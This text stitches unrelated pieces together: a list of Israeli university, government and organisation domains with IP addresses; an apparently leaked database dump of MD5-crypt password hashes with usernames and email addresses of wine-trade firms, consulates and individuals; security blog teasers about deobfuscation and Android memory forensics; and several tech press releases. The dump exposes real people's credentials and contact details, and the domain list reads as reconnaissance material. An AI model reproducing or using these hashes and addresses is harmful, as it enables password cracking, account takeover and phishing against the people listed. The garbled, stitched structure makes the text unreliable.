    overseas.huji.ac.il = 132.64.178.201

    ozar.mof.gov.il = 147.237.72.111

    packetstorm.interhost.co.il = 81.218.230.204

    panim.org.il = 80.179.148.187

    pard.technion.ac.il = 132.68.9.233

    patentech.co.il = 54.247.181.80

    pc.galim.org.il = 132.64.3.17

    peacenow.org.il = 212.179.115.81

    perrigo.co.il = 128.121.143.171

    Petri.co.il = 184.72.55.242

    physics.technion.ac.il = 132.68.74.160

    phys.technion.ac.il = 132.68.74.214

    picasso.eng.tau.ac.il = 132.66.48.13

    planet.linux.org.il = 82.80.248.176

    plasma-gate.weizmann.ac.il = 132.77.150.54

    pluto.huji.ac.il = 132.64.178.45

    plutomail.huji.ac.il = 132.64.178.45

    pluto.mscc.huji.ac.il = 132.64.178.45

    polishinstitute.org.il = 195.28.180.122

    pompadour.co.il = 80.237.237.140

    portal.macam.ac.il = 192.115.100.178

    post.tau.ac.il = 132.66.3.150

    pr3.haifa.ac.il = 132.74.1.153

    pradaxa.co.il = 62.90.118.246

    pregnantinthecity.co.il = 194.213.4.9

    priel.biu.ac.il = 132.70.51.10

    pshita.cet.ac.il = 62.219.59.149

    radiolive.co.il = 82.166.147.7

    ramotweb.tau.ac.il = 132.66.102.117

    rbni.technion.ac.il = 132.68.238.44

    regavim.org.il = 62.219.78.38

    regulation.huji.ac.il = 132.64.178.195

    reka.iba.org.il = 212.143.64.150

    research.haifa.ac.il = 132.74.1.30

    researchportal.ekmd.huji.ac.il = 132.64.170.9

    reshit.hartman.org.il = 62.219.69.250

    responsa.biu.ac.il = 132.70.61.50

    retorno.org.il = 69.163.180.109

    Reuters.co.il = 199.203.150.170

    rhr.org.il = 62.219.17.212

    rng.org.il = 5.100.248.16

    rn.haifa.ac.il = 132.74.1.153

    roma.mfa.gov.il = 147.237.76.32

    roz.ort.org.il = 62.0.192.13

    rsa.gov.il = 147.237.76.49

    russian.b144.co.il = 147.235.246.154

    rus-tourist.sheba.co.il = 109.226.38.102

    sakhnin.ac.il = 192.115.100.144

    sapir.tau.ac.il = 132.66.33.9

    saveoursea.org.il = 174.121.227.2

    sba.tamat.gov.il = 147.237.76.45

    science.huji.ac.il = 132.64.3.119

    scity.co.il = 62.90.102.27

    sderotmedia.org.il = 50.97.96.11

    seminar.ramah.org.il = 62.90.247.226

    Seret.co.il = 213.8.172.187

    shaanan.ac.il = 192.115.100.144

    shaharit.org.il = 84.94.227.28

    shakufbaohel.org.il = 82.166.192.201

    shakuf.org.il = 62.0.66.41

    sharetpoint.blogspot.co.il = 173.194.35.44

    shas.org.il = 213.8.195.70

    sheba-international.sheba.co.il = 109.226.38.102

    shituf.org.il = 173.254.28.21

    shituf.piyut.org.il = 132.64.3.17

    shluvim.macam.ac.il = 192.115.100.139

    sicsa.huji.ac.il = 132.64.3.119

    singalovski.ort.org.il = 62.0.209.2

    sites.huji.ac.il = 132.64.3.94

    s.ort.org.il = 62.0.192.63

    spigo.co.il = 212.53.89.138

    sport.garber-tickets.co.il = 212.143.143.94

    spsupport.cet.ac.il = 62.219.59.138

    ssjfa.huji.ac.il = 132.64.178.201

    stage.co.il = 212.68.159.67

    statis.ncrd.org.il = 81.218.214.154

    stockoptions.org.il = 80.179.238.180

    studean.huji.ac.il = 132.64.178.195

    students.dan.ac.il = 212.150.144.29

    students.haifa.ac.il = 132.74.1.85

    support.huji.ac.il = 132.64.178.195

    t3.technion.ac.il = 132.68.238.44

    tad.colman.ac.il = 193.106.52.81

    talpiot.sheba.co.il = 109.226.38.102

    tarbut.cet.ac.il = 62.219.59.149

    tasp.technion.ac.il = 132.68.238.44

    tau.ac.il = 132.66.16.6

    taubcenter.org.il = 80.244.168.41

    tavo.zap.co.il = 213.8.147.10

    taxjustice.blogspot.co.il = 173.194.35.44

    tbilisi.mfa.gov.il = 147.237.76.32

    tbk.mako.co.il = 80.244.175.124

    tcc.technion.ac.il = 132.68.238.44

    tce.technion.ac.il = 132.68.49.14

    telecards.islands.co.il = 213.8.196.100

    telem.openu.ac.il = 147.233.250.222

    telnof.ort.org.il = 62.0.192.13

    tenders.huji.ac.il = 132.64.3.6

    tenro.org.il = 217.118.19.71

    thedissertation.amuta.org.il = 62.219.197.36

    tlabs.bgu.ac.il = 132.72.23.98

    tlc.cet.ac.il = 62.219.59.138

    Tnet.org.il = 212.179.114.168

    toldotofakim.cet.ac.il = 62.219.59.149

    TopBuy.co.il = 85.17.88.169

    toravoda.org.il = 109.74.200.183

    tq.cs.tau.ac.il = 132.67.252.237

    Trance.org.il = 80.179.179.130

    try.ramah.org.il = 62.90.247.226

    tv.social.org.il = 91.216.222.43

    tx.technion.ac.il = 132.68.1.192

    ug.technion.ac.il = 132.68.238.21

    ulpangordon.co.il = 97.74.144.96

    untitled.org.il = 82.80.221.153

    uscj.org.il = 69.167.168.241

    uti.org.il = 82.166.80.252

    uxi.org.il = 80.179.147.252

    vadumiacob.huji.ac.il = 132.64.178.195

    veg.anonymous.org.il = 91.193.50.46

    velvetunderground.co.il = 82.166.192.206

    video.technion.ac.il = 132.68.238.51

    virtual2002.tau.ac.il = 132.66.182.200

    virtual.tau.ac.il = 132.66.182.200

    vufind.huji.ac.il = 132.64.3.59

    wallstreet.bizportal.co.il = 192.118.97.103

    web.bgu.ac.il = 132.72.126.91

    webcourse.cs.technion.ac.il = 132.68.32.250

    webee.technion.ac.il = 132.68.48.7

    weblaw.haifa.ac.il = 132.74.1.224

    webmaster.org.il = 212.143.218.45

    wep.co.il = 74.54.218.18

    wise-obs.tau.ac.il = 132.66.135.14

    wis-wander.weizmann.ac.il = 205.186.163.29

    wordpress.haifa.ac.il = 132.74.1.153

    workers.org.il = 64.202.115.31

    workshop.ee.technion.ac.il = 132.68.48.7

    worldcities.haifa.ac.il = 132.74.1.153

    wujs.org.il = 208.43.2.244

    yedion.ono.ac.il = 81.218.55.208

    yedion.pac.ac.il = 212.150.209.162

    yeshatid.org.il = 212.199.167.14

    yeshivakg.co.il = 82.166.192.6

    yeshiva.org.il = 81.218.249.60

    Yeshiva.org.il = 81.218.249.60

    yeshiva.org.il = 81.218.249.60

    Yeshiva.org.il = 81.218.249.60

    yhb.org.il = 62.219.58.210
-----------------------------------------------------------------------------------------------------
password                                username        email
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Edward          edwine@on.aibn.com
$1$AGLuioxG$Dtg8N/AA.Zx3.z4ABP6qQ1      jmjarvis        jmjarvis@msn.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Rubaiyat        paul@greatdrinks.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Freixenet Group mayewen@compuserve.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Philippe Dandurand Wines Ltd.   ewine@philippedandurandwines.ca
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Dionysus        alex.dionysus@rogers.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Select Wine Merchants   haddleton@selectwines.ca
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Carriage Trade Wines    carriagetradewines@netzero.net
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Sleeman Brewing & Malting Co. Ltd.      peterchubb@rogers.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Woodman Wines & Spirits Inc.    info@woodmanwinesandspirits.com
$1$nulGHiok$76TcYGPHJxOaP.47SXN4z1      Stem Wine Group Inc.    ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Hobbs & Co. Wine Merchants Inc. inquiries@hobbswines.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Lifford Agency Limited  steven@liffordwineagency.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      British Consulate-General       valerie strand@fco.gov.uk
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Prevedello & Mathews International Wine talktous@pmwine.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      E&J Gallo Winery Canada Ltd.    stephen.gray@ejgallo.com
$1$QXNneNkZ$j28u/0iFxVHaJqn2KbHK2/      sam     sam@home.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Peter Mielzynski Agencies Ltd.  jws@pmacanada.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Noble Estates Wines & Spirits Inc.      Noble@NobleEstates.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Rogers & Company        wineinfo@rogcowines.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      German Wine Information Bureau  rfiorelli@sympatico.ca
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Southcorp Wines daphne.christie@southcorp-usa.com
$1$cbg.2syE$qzeeJefe9IrVUXK2JPThN.      Signature Wines & Spirits       ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Churchill Cellars Ltd.  chris@churchillcellars.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Mark Anthony Brands Ltd.        msari@markanthony.com
$1$U4xMddjE$I5D9HHq/9cxj9KTdxe5Oz/      Le Sommelier    ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Esprit Agencies esprit@primus.ca
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Embassy of France, Economic Commission  guy.bender@dree.org
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Kendall-Jackson Wine Estates    maria.allan@kjmail.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      RKW Wine Imports        ted.warren@sympatico.ca
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Lorac Wine Company      lorac@bellnet.ca
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Pacific Wine & Spirits  ONTARIOBRANCH@PACIFICWINEANDSPIRITS.COM
$1$MLHFm0EF$QuCAnt2FA/vf7qwrwdXRb/      Canadian Association of Professional Som        ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Diamond Estates Wines & Spirits Ltd.    agreen@diamondwines.com
$1$g3zGr8z8$MuaJR9Z7zQn.fp67VFCzv/      eamesb  ben.eames@vincor.ca
$1$Ih3IviSd$E5MaxzJsb9iCa4Lxhi4ai1      The Vine - Robert Groh Agency   ian.campbell@oiwsba.com
$1$NICNcsiC$SdD8Jjt6pO4l30FH8DiDn/      Globe-Trotter Trading Co. Inc.  ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Pernod Ricard Canada    ruth.cifuentes@pernod-ricard-canada.com
$1$LA/dDA.R$YtRk9rpW.bSUB.iHyQyda/      Halpern Enterprises     ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Independent Wine Education Guild        sthurlow@rogers.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Importex Trading International  importex@canada.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      The Kirkwood Group      mmcvean@thekirkwoodgroup.com
$1$ColpzrFX$bXCOMRiC3k490WzwWSZky.      Miguel Torres Canada Ltd.       ian.campbell@oiwsba.com
$1$gEWB2GKp$K9uHacqpaHp9J5.cbf0XG1      arana   buzon.oficial@toronto.ofcomes.mcx.es
$1$zUnyu1JH$DT40ARc2OMcdLPcvlz7B1/      ben eames       ben.eames@vincor.ca
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Vincor International    ben.eames@vincor.ca
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Brave New Wines Limited ted.robinson@bravenewwines.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Regazzi Wine & Spirits Selection Inc.   regazzi@idirect.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Sopexa Canada Ltd.      ted.kalaboukis@sopexa.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      H.H.D. Imports Inc.     hhdimports@intown.net
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Saverio Schiralli Agencies Ltd. Don.A@SchiralliAgencies.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      The Wine Company Ltd.   ericak@thewinecompany.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Australian Wine Bureau Canada   awb.canada@austrade.gov.au
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      J. Cipelli Wines & Spirits Inc. cipwinesnspirits@aol.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Whitehall Agencies Inc. info@whitehall.ca
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Trade Commission of Spain       buzon.oficial@toronto.ofcomes.mcx.es
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Majestic Wine Cellars Inc.      info@majesticwine.ca
$1$Qdu24oZK$RKQa2T7hYe/Q.7Z1YlNwI0      FWP Trading Inc.        ian.campbell@oiwsbaa.com
$1$3f.1RfQa$yDp9RoVmnpIKOgmMCzGfc/      Infield Marketing Group ian.campbell@oiwsba.com
$1$C1EqORiH$ppYYCH37aq38DrjS5uqVe0      Brown-Forman Corporation (Canada)       ian.campbell@oiwsba.com
$1$qRuwNw1x$9vwpAahnnfybjZchsumbX/      Premier Publications and Shows  ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Grolsch Canada  ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Wineworld Importers and Exporters Ltd.  ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Authentic Wines & Spirits Merchants     kbach@chartonhobbs.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Charton Hobbs   kbach@chartonhobbs.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Knox & Co. International Inc.   dknox@sympatico.ca
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      J.F. Hillebrand Canada Inc.     k.kendall@jfhillebrand.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Wine Institute of California    rick.slomka@sympatico.ca
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      The Opimian Society     roddci@rogers.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Robert Mondavi Canada   zoltan.fekete@robertmondavi.com
$1$QohEIbX7$TqWANPlMROmDjnpkQZ5DO/      Town Media (Gourmet Food & Wine Expo an ian.campbell@oiwsba.com
$1$XTQ6O4yI$1ICDt5LQcfeXUMtKGQf7E1      Calibrium International ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      MCO Marketing & Distribution    mco@mcowines.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Beam Global Canada      peter.sainsbury@maxxium.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      swec    richardg@smallwinemakers.ca
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Diageo Canada Inc.      conrad.desouza@diageo.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Wines of South Africa   keenan@propellerpr.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Vin Vino Wine Merchants jturco@vinvino.ca
$1$A0UPA3bl$8Ln3IGTr9Arh.BGKpC1wp/      Cadbury Beverages       ian.campbell@oiwsba.com
$1$ovgRB//L$KiNvqxPETckUhP5kn5thU/      Town Media (Gourmet Food & Wine Expo an ian.campbell@oiwsba.com
$1$2aQ76G5T$qIuV2dJyI1uImwdyHIJrM0      Delicato Family Vineyards       ian.campbell@oiwsba.com
$1$hmrRmR7v$qzRWrH1l9/Xy/NbJSe8dR0      Town Media      ian.campbell@oiwsba.com
$1$5Lza0GLf$f62mA6gC6CJ.cHXhPteO31      Vinaio Wine Merchants   ian.campbell@oiwsba.com
$1$o64c22nE$FjTHDgO1ZWSaLUngAHj.B0      CHEP Canada Inc.        ian.campbell@oiwsba.com
$1$Eq4vPkOX$BxU0wmjx2WZ92ucW9Goqi/      The Dochas Company Inc. ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Bacardi Canada Inc.     ian.campbell@oiwsba.com
$1$vhc8ORGP$Gq43319I0JQBsKtOg9e.L1      B&W Wines Inc.  ian.campbell@oiwsba.com
$1$3SPeVR6z$8QfEJvEbvxyBsnLzrMoyR/      Premier Consumer Shows  ian.campbell@oiwsba.com
$1$yn2aoHr6$vVg4crDDrbdY2xuChOx86/      Celebrated Cellars      ian.campbell@oiwsba.com
$1$VoEwV/mO$QtpqFVU7qGMGqB.YaGrdo1      Container World Forwarding Services Inc.        ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Corby Distilleries Ltd. ian.campbell@oiwsba.com
$1$kFx34PJ8$WnsNwB/bf8SYy37Fzah4g1      The Epernay Tasting & Promotion Co. Ltd.        ian.campbell@oiwsba.com
$1$J2nvscNQ$ftkHhN/eJAmu4qDBBUB3i1      Carto Enterprise        ian.campbell@oiwsba.com
$1$LeByuae.$YcVnVha3iVM603Icrfujt.      Ketchin Sales & Marketing       ian.campbell@oiwsba.com
$1$n8FWW0De$ZwLHZCxFPKZRFK.GVLHsb.      Canadian Association of Professional Som        ian.campbell@oiwsba.com
mar1user        mar1user        mar1user@a.ba
$1$xHzzIyHV$ikJpb.5P.Wi1ODhpC0DiU0      Independent Distillers Canada   ian.campbell@oiwsba.com
$1$vJE1ZUjn$nF6VhrI3bWUsDROlM5bla/      Ozawa Canada Inc.       ian.campbell@oiwsba.com
$1$Ubn902kA$DKCzbZiz.JLxyz9EIkRc8.      Panalpina Inc.  ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Portuguese Trade & Tourism Commission   ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Wine Lovers Agency Inc. ian.campbell@oiwsba.com
$1$QiMzfkyJ$iRwVd34CljflDJZOA/Mno.      Azureau Wine Agency     ian.campbell@drinksontario.com
$1$0BvYmXD7$HE8Hs5g8GHCOC3lKkWWDS.      DGB Canada      ian.campbell@oiwsba.com
$1$7NVJLmP0$qAnEbP8b9bd9CRwOVRfWF0      Cohn & Wolfe Toronto    ian.campbell@oiwsba.com
$1$O9ggYnXK$P2c5nvDT9rzXQin4nYSAi1      Gourmet Food & Wine Expo        ian.campbell@oiwsba.com
$1$PZLPI9tg$nCw5v.f64BIuzIxhhFT530      grape   ian.campbell@oiwsba.com
$1$EHgdw9w8$3HzsH.VJDsv87YXpJv6Ly/      The Forefront Communications Network Inc        ian.campbell@oiwsba.com
$1$zLqRE2Lp$KR7VJC.tzp9Jh/Op/1bIv.      The Forefront Communications Network Inc        ian.campbell@oiwsba.com
$1$/Zj09dwz$QdIYCsqRbqlLWF1BQINKK.      Forefront Communications        ian.campbell@oiwsba.com
$1$gGz.MZ2o$UrRPWAio56fIHyqv5EM25/      Oyster Bay Wines Canada Limited ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Beverage Brands (UK) Limited    ian.campbell@oiwsba.com
$1$lZAzrih2$egYN5U3SpofVqictLvVG7/      Modelo Molson Imports L.P.      ian.campbell@oiwsba.com
$1$txQYQRHU$k3fOITOGHdlPtJkxY5BB0/      Vinexx  ian.campbell@oiwsba.com
$1$G2OJXvxX$wCLb6ndw2D6mfE.U3q0cn1      Abcon International Wine Merchants Inc. ian.campbell@oiwsba.com
$1$iq84N88E$3jby1RRKZRNOxOcEEFYvd.      BGS Intertrade Ltd.     ian.campbell@oiwsba.com
$1$uikwLkiZ$hds/rV.Jfbzn6DJIq9zbQ0      JMV Food Service Canada ian.campbell@oiwsba.com
$1$Pf1r1VbN$/NfdrYOMiVDdZoVDCwH4U.      CAPS    ian.campbell@oiwsba.com
$1$dezoq9uS$XAsSkmE1P/VYMmjCU4yCm/      Canadian Association of Professional Som        ian.campbell@oiwsba.com
$1$WX/LkJVH$uMtl2iiJIBRrbkbkZzZsy1      Canadian Association of Professional Som        ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Robert Oatley Vineyards (Canada) Pty Ltd        ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Robert Oatley Vineyards (Canada) Pty Ltd        ian.campbell@oiwsba.com
$1$d8K7i45R$jY8mKnHkdypuQKUI7thvn.      Robert Oatley Vineyards (Canada) Pty Ltd        ian.campbell@oiwsba.com
$1$OXltcOMS$7ts7uh8evtY1b7tQyY5hE.      Robert Oatley   ian.campbell@oiwsba.com
$1$nOJ4Gdmw$xlH/D0ZCONVJhQFmieArs/      samira  sima_sina3@yahoo.com
$1$MoDV3YG1$0PMTLnzY7reLjnKvhD.Ht/      The Kolonaki Group Inc. ian.campbell@oiwsba.com
$1$mfmTfY/P$GbhEJAe5D735rrCQOakE6/      ehsan   ehsan94@yahoo.com
$1$WqnwHa0v$jvTZu0SRKc55lQhhQYS29.      Von Terra Enterprises Ltd.      ian.campbell@oiwsba.com
$1$rZcwBP/U$1WuOcA2mmYYC4LD/rtn63/      Tandem Wine Selection   ian.campbell@oiwsba.com
$1$jC3enQgR$BIUUzSzrDNgYs56wKKW0i.      admin   jjjj@live.fr




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Acrobat JavaScript Deobfuscation

$
0
0

After reading Eric Romang's blog,I try to find a new way to deobfuscate malicious Acrobat JavaScript because using document.write() is some really dirty work.

1. Basic Methods to Deobfuscate Acrobat JavaScript
1.1 document.write()
Pros: using Firebug, Dev tools,
Cons:
     can't recognize PDF-specific objects
     dirty work(possibly)

read more.........http://elsonmath.blogspot.com/2013/04/acrobat-javascript-deobfuscation.html

New Research on Android Application (Dalvik) Memory Analysis and the Chuli Malware!

$
0
0

In this blog post, we will be presenting new functionality that will be incorporated into the next major Volatility release after version 2.3. This functionality allows for deep analysis of application internals on the Android operating system. All Android applications, such as those downloaded from Google Play, are powered by Dalvik, which is Google’s version of the Java Virtual Machine (JVM). Each application runs in a separate process and is given its own instance of Dalvik. By performing memory analysis on specific instances of Dalvik, we can recover all information of an application, such as loaded classes, and the static and instance variables and methods (functions) of each class.

read more..........http://www.504ensics.com/android-application-dalvik-memory-analysis-the-chuli-malware/

New Version of EnCase® eDiscovery Boosts Control, Performance and Security

$
0
0

Version 5.2 Streamlines Legal Hold, Supports “Military-Grade” Encryption and Provides Faster Transfer to SaaS Review Platform
PASADENA, Calif.--(BUSINESS WIRE)--Guidance Software, the World Leader in Digital Investigations™, announced today EnCase® eDiscovery 5.2, the latest version of its comprehensive e-discovery software with additional legal hold control, military-grade encryption, and faster data transfer to EnCase® eDiscovery Review.
“Those of us who have served as in-house counsel appreciate the need for new technologies to improve legal hold and litigation preparation processes.”
The release is the latest version of EnCase eDiscovery, which integrates complete e-discovery workflow functionality – from legal hold and preservation to SaaS-based review and production. Named a “leader” in Gartner’s 2012 Magic Quadrant for E-Discovery, EnCase eDiscovery provides in-house counsel with control and oversight of every phase of the e-discovery process.
“As data volumes continue to skyrocket, legal holds grow in complexity and difficulty with each additional day of forwarded emails, downloaded documents and corporate data walking out the door on personal devices,” said David Horrigan, Esq., E-Discovery and Information Governance Analyst at 451 Research. “Those of us who have served as in-house counsel appreciate the need for new technologies to improve legal hold and litigation preparation processes.”
New Legal Hold, Encryption and Speed Improvements
The legal hold capabilities included in EnCase eDiscovery now streamline the management of custodians by allowing for designation of individuals within a group as “inactive” or “active.” This feature enables reviewers to save time by selecting a logical workgroup of custodians, with the flexibility to make exceptions for those not involved with the current matter via the inactive status.
EnCase eDiscovery also now supports a new level of security protection with AES-256 encryption for collected data, providing the industry’s highest level of encryption for sensitive data residing in the cloud or in other areas outside of the corporate network. Users can set encryption options when the job is created and also lockdown access to their global repository with secure tracking and administration of keys and passwords.
File transfer speed to the SaaS-based EnCase eDiscovery Review platform is also improved in Version 5.2, allowing review teams to begin their work more quickly and efficiently. The improvements are two-fold with the addition of intelligent data transfer and packet compression. Now only data that is new to the repository is sent, reducing the total volume of documents transferred. Packet compression has also been added, further reducing data volume and transfer time. In-house counsel also has access to real-time data integrity reports that track network transmission status to provide transparency into the data-transfer process.
“EnCase eDiscovery helps in-house counsel take control of their complete e-discovery process and better manage their costs,” said Victor Limongelli, Guidance Software president and chief executive officer. “The new features in this software version further improve the efficiency and collaboration of the e-discovery process for our customers.”
About Guidance Software, Inc.
Guidance Software is recognized worldwide as the industry leader in digital investigative solutions. Its EnCase® Enterprise platform is used by numerous government agencies, more than 65 percent of the Fortune 100, and more than 40 percent of the Fortune 500, to conduct digital investigations of servers, laptops, desktops, and mobile devices. Built on the EnCase Enterprise platform are market-leading electronic discovery and cyber security solutions, EnCase® eDiscovery and EnCase® Cybersecurity, which enable organizations to respond to litigation discovery requests, proactively perform data discovery for compliance purposes, and conduct speedy and thorough security incident response. For more information about Guidance Software, visit www.guidancesoftware.com.
EnCase®, EnScript®, FastBloc®, EnCE®, EnCEP®, Guidance Software™ and Tableau™ are registered trademarks or trademarks owned by Guidance Software in the United States and other jurisdictions and may not be used without prior written permission. All other trademarks and copyrights referenced in this press release are the property of their respective owners.
GUID-F

Contacts

Guidance Software, Inc.
Brigitte Engel, 626-768-4631
newsroom@guidancesoftware.com

Nebula Introduces the Cloud Computer

$
0
0

MOUNTAIN VIEW, Calif.--()--Nebula®, the cloud systems company, today announced the general availability of Nebula One™, the world’s first enterprise cloud computer.
“PARC researchers can now use and reuse the readily-available compute resources they need from the Nebula One cloud, provisioning in minutes what once took days to manually provision or months to procure”
Nebula One was built from the ground up to power the next generation of big data, web, and mobile applications – while addressing enterprise security and management requirements and avoiding vendor lock-in.
Nebula One is a turnkey private cloud system that provides compute, network and storage services through a simple self-service interface and popular APIs, using industry-standard servers from vendors such as HP, IBM, and Dell.
“The Nebula One delivers on Nebula’s mission to democratize cloud computing by bringing the simplicity, agility, and operational efficiency of the world’s largest Internet companies to all enterprises at a fraction of the cost of public cloud services,” said Chris C. Kemp, co-founder and CEO of Nebula.
Previous cloud solutions often required users to put in hours of work to provision and maintain their computing environment. The Nebula One private cloud system frees the organization to focus on applications instead of infrastructure.
Market-leading enterprises have been testing early versions of Nebula’s product for the past year. In many industries, advances in infrastructure are driving the need for a new generation of computing technology that is an order of magnitude more efficient than what's available today. With the Nebula One, the ability to deploy pre-certified servers from vendors that customers already trust replaces the need for expensive, specialized computing infrastructure.
PARC, the R&D lab that invented the computer mouse and the graphical user interface, has selected Nebula to power their private cloud infrastructure. "PARC researchers can now use and reuse the readily-available compute resources they need from the Nebula One cloud, provisioning in minutes what once took days to manually provision or months to procure," said Walt Johnson, Vice President, Intelligent Systems Lab, PARC.
The Product
At the core of the Nebula One cloud system is the Nebula Cloud Controller™, a hardware appliance that turns racks of certified industry-standard servers into a scalable on-premise infrastructure-as-a-service cloud system. Nebula One runs Cosmos, Nebula’s distributed enterprise cloud operating system, which builds on OpenStack to provide a rich self-service user experience and compatibility with Amazon Web Services and OpenStack APIs.
While a single-rack deployment is enough for many medium-sized businesses, the Nebula One system can scale to multi-rack deployments to meet the needs of large enterprises.
The Nebula One is available for purchase today. For more information, and to learn more about purchasing a Nebula One system, visit www.nebula.com.
About Nebula
Nebula is dedicated to enabling all enterprises to easily, securely and inexpensively deploy private cloud computing infrastructures. Nebula makes the Nebula One, the world’s first cloud computer, enabling any business to easily build a scale-out private computing cloud from racks of industry-standard servers. Nebula is privately held and venture‐funded by Kleiner Perkins Caufield & Byers, Comcast Ventures, and Highland Capital Partners. Other investors include Innovation Endeavors, and Google's first investors, Andy Bechtolsheim, David Cheriton and Ram Shriram. For more information, visit Nebula at www.nebula.com.

Contacts

for Nebula
Mary Devincenzi, +1 408-761-4285
mdevincenzi@sparkpr.com

WANdisco Applauds Release of Apache Bloodhound

$
0
0

Original Project Submitter, WANdisco, Supports Project With On-Staff Committers
SAN RAMON, CA--(Marketwired - Apr 2, 2013) - WANdisco (LSEWAND), a provider of high-availability software for global enterprises to meet the challenges of Big Data and distributed software development, is pleased to support Apache Bloodhound™, which was officially announced today as a Top-Level Project (TLP) by the Apache Software Foundation (ASF). Originally submitted to the ASF in December 2011 by WANdisco, Bloodhound is a software development collaboration tool based on Trac that includes a Subversion repository browser, wiki, and defect tracker.
The WANdisco developers serving on the Project Management Committee (PMC) or participating at some level in the development of Bloodhound have been involved since the project's inception. Apache Bloodhound is an issue tracker with a tightly integrated source code browser that works with Apache Subversion and Git. It also provides Wiki functionality and is compatible with hundreds of free plugins available for Trac, allowing users to customize their experience even further.
"WANdisco received many requests for an issue tracker and at the time, open source options available for integration were limited, which is why we decided to invest in setting one up in the Apache Incubator," said David Richards, CEO of WANdisco. "WANdisco has been actively supportive of the ASF, and we're proud to have played a leading role in Bloodhound."
"When Bloodhound entered the incubator, while it was built on the Trac framework, it was a completely new project," said Gary Martin, Vice President of Apache Bloodhound and WANdisco developer. "Bloodhound's strengths lie in its powerful combination of Apache Subversion source control and robust ticket system."
About WANdisco Technology and Subversion SolutionsWANdisco's patented non-stop replication technology turns globally distributed Apache Subversion repositories into mirrors of each other, so they are always in complete sync, ensuring 100 percent uptime. Users at every site have instant access to the same data and changes made locally can be seen and accessed by everyone immediately, enabling teams to work together simultaneously from anywhere around the world. Developers at every location enjoy LAN-speed performance for all operations and have access to the most up-to-date code changes, regardless of where those changes originated globally.
